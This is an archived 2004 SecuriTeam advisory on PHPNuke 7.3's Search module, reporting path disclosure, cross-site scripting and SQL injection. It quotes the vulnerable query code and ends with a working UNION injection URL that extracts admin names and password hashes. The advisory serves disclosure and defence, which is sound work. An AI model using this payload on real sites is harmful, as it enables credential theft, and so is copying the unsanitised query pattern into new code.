[UNIX] PHPNuke Multiple Vulnerabilities in Search Module
From: SecuriTeam (support_at_securiteam.com)
Date: 07/22/04
- Previous message: SecuriTeam: "[UNIX] PHPNuke Multiple Vulnerabilities in Search Module (Comments Search)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 22 Jul 2004 18:19:37 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PHPNuke Multiple Vulnerabilities in Search Module
------------------------------------------------------------------------
SUMMARY
" <http://www.phpnuke.org/> PHP-Nuke is a news automated system specially
designed to be used in Intranets and Internet. The Administrator has total
control of his web site, registered users, and he will have in the hand a
powerful assembly of tools to maintain an active and 100% interactive web
site using databases."
The well known content management system suffers from a variety of
vulnerabilities in it's search module, among others are full path
disclosure, cross-site scripting and SQL injections located throughout the
code in multiple places.
DETAILS
Vulnerable Systems:
* PHPNuke version 7.3
Full Path Disclosure:
The following examples demonstrate how it is possible to extract the path
to the scripts from the server. The vulnerability exists in the
"/modules/Search/index.php" script. When navigating to the search page
which is usually located at the following URL:
<http://localhost/nuke73/modules.php?name=Search>
http://localhost/nuke73/modules.php?name=Search, and entering some invalid
characters such as double asterisks and/or a plus sign, the response
received is:
Warning: eregi(): REG_BADRPT: in
D:\apache_wwwroot\nuke73\modules\Search\index.php on line 228
Warning: eregi(): REG_BADRPT: in
D:\apache_wwwroot\nuke73\modules\Search\index.php on line 232
Warning: eregi(): REG_BADRPT: in
D:\apache_wwwroot\nuke73\modules\Search\index.php on line 235
Which are standard PHP error messages revealing the full path to the
scripts. It is important to note that any system that is written in PHP
should filter such characters so that standard PHP error messages will not
be generated.
Cross-Site Scripting:
In the search module script "/modules/Search/index.php", the variable $sid
allows cross-site scripting, like so:
http://localhost/nuke73/modules.php?name=Search&sid=[xss code here]
The user submitted variable $max is also a cross-site scripting vector of
attack, but only if the number of search results are 9 or greater:
http://localhost/nuke73/modules.php?name=Search&query=*&max=[xss code
here]
The $sel1 to $sel5 variables are un-initialized and might yield a
cross-site scripting vulnerability:
http://localhost/nuke73/modules.php?name=Search&query=waraxe&sel1=[xss
code here]&type=comments
In the same fashion, the $match variable is un-initialized:
http://localhost/nuke73/modules.php?name=Search&a=6&query=*&match=[xss
code here]
Finally, the $mod1 to $mod3 variables are also uninitialized:
http://www.nukecops.com/modules.php?name=Search&query=*&mod3=[xss code
here]
The only caveat to this last XSS issue is that the specified module must
be disabled in order for the attack to succeed.
SQL Injection
The first SQL injection vulnerability is a non-critical one in the
"/modules/Search/index.php". The injection is possible due to the
un-sanitized user-submitted $min variable which is directly used in an SQL
query thereafter. The variable is used after the ORDER BY or LIMIT SQL
constructs and poses no significant threat for MySQL version 4.0 and
prior. However, the relatively newer 4.1 version of MySQL supports
subselects which makes this vulnerability a major issue since a subselect
can be appended after the ORDER BY / LIMIT clauses.
The second SQL injection is one that allows the attacker much more room to
operate. Looking at the original code:
$query = addslashes($query);
if ($type=="stories" OR !$type)
{
if ($category > 0)
{
$categ = "AND catid='$category' ";
}
elseif ($category == 0)
{
$categ = "";
}
$q = "select s.sid, s.aid, s.informant, s.title, s.time,
s.hometext, s.bodytext,
a.url, s.comments, s.topic from ".$prefix."_stories s,
".$prefix."_authors a
where s.aid=a.aid $queryalang $categ";
if (isset($query)) $q .= "AND (s.title LIKE '%$query%' OR
s.hometext LIKE '%$query%'
OR s.bodytext LIKE '%$query%' OR s.notes LIKE '%$query%')
";
if ($author != "") $q .= "AND s.aid='$author' ";
if ($topic != "") $q .= "AND s.topic='$topic' ";
if ($days != "" && $days!=0) $q .= "AND TO_DAYS(NOW()) -
TO_DAYS(time) <= '$days' ";
$q .= " ORDER BY s.time DESC LIMIT $min,$offset";
$t = $topic;
$result5 = $db->sql_query($q);
The code shown presents a problem because the "if/elsif" code block does
not contain the ending "/else" part. This opens up the possibility of
setting the $category variable to a value less than 0 which would make the
$categ variable essentially an un-initialized variable, allowing us to
insert SQL commands through it. Following is an example that demonstrates
how to perform this:
http://localhost/nuke73/modules.php?name=Search&type=stories&query=f00bar&category=-1&categ= and 1=2 UNION SELECT 0,0,aid,pwd,0,0,0,0,0,0 from nuke_authors/*
ADDITIONAL INFORMATION
The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
Vind.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] PHPNuke Multiple Vulnerabilities in Search Module (Comments Search)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NEWS] XSS and SQL Injection in Cisco CallManager/Unified Communications Manager Logon Page
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... No other Cisco products are known
to be affected by this vulnerability. ... The cross-site scripting vulnerability
and the SQL injection vulnerability ... Attacks against these ... (Securiteam) - [UNIX] Beehive Forum Software SQL Injection Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Beehive Forum Software SQL
Injection Vulnerability ... (Securiteam) - [UNIX] Multiple Vulnerabilities in NukeBookmarks (Full path disclosure, Cross Site Scripting, SQL I
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Cross Site Scripting and
SQL Injection ... Full Path Disclosure Vulnerability: ... (Securiteam) - [UNIX] osCommerce SQL Injection Vulnerability (create_account_process.php)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... vulnerability in the product
allows remote attackers to gain elevated ... * osCommerce version 2.2-MS1, possibly older
versions. ... osCommerce is vulnerable to SQL Injection vulnerability in the ...
(Securiteam) - [NT] Multiple Vulnerabilities in GoSmart Message Board
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... a SQL Injection vulnerability
and a Cross Site ... (Securiteam)
